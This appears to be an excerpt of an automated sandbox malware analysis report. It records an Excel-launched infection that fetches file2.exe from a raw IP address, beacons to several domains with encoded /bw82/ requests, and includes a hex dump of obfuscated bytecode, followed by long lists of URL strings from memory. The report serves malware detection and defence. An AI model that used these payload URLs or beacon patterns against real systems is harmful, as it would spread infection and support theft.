00 00 00 00 00 00 00 00 00 00 b0 f8 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 3e 0b 00 88 b9 01 00 03 00 00 00 43 01 00 06 68 36 02 00 90 08 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 2b 02 26 16 02 28 01 00 00 0a 2a 36 2b 02 26 16 00 02 28 04 00 00 0a 00 2a 00 00 13 30 03 00 12 01 00 00 01 00 00 11 fe 09 00 00 fe 0e 00 00 fe 0c 00 00 20 2b f3 88 0a 20 96 b2 41 ee 58 20 2a a0 25 08 59 20 87 05 a5 f0 61 20 02 00 00 00 63 3b 68 00 00 00 fe 0c 00 00 20 e1 68 eb e3 20 e9 68 eb e3 61 59 45 04 00 00 00 5f 00 00 00 2a 00 00 00 a1 00 00 00 52 00 00 00 fe 0c 00 00 20 fe 73 c8 26 65 20 66 8c 37 d9 59 20 02 00 00 00 63 66 59 45 02 00 00 00 64 00 00 00 4c 00 00 00 38 77 00 00 00 20 44 78 c5 1e 65 20 23 a7 e4 e1 61 20 5d df 21 ff 58 20 01 00 00 00 63 2a 20 2b 0e 54 1b 65 66 65 20 db f1 ab e4 59 2a 20 0b 00 00 00 66 20 01 00 00 00 63 2a 20 c7 ef eb 2e 20 ce c8 4e 09 59 20 06 d9 62 da 58 2a 20 03 49 7e 12 20 2a 68 99 eb 61 20 e1 4d dc dc 58 20 f2 90 3c 29 61 2a 20 18 75 52 ea 20 65 ff c1 fc 59 20 3e 39 9f 0f 61 20 9c 4c 0f e2 59 2a 20 19 b6 66 1f 20 98 fb 6f 12 59 20
          Source: global trafficHTTP traffic detected: GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1Host: www.thepoetrictedstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.tuvandadayvitos24h.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.acdfr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.246.6.109 35.246.6.109
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /ttkkz/file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31FF70E4.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /ttkkz/file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1Host: www.thepoetrictedstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.tuvandadayvitos24h.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.acdfr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.yjpps.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 16:19:08 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.acdfr.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Wed, 27-Jan-2021 16:19:08 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages20.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 31 30 34 37 39 38 34 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
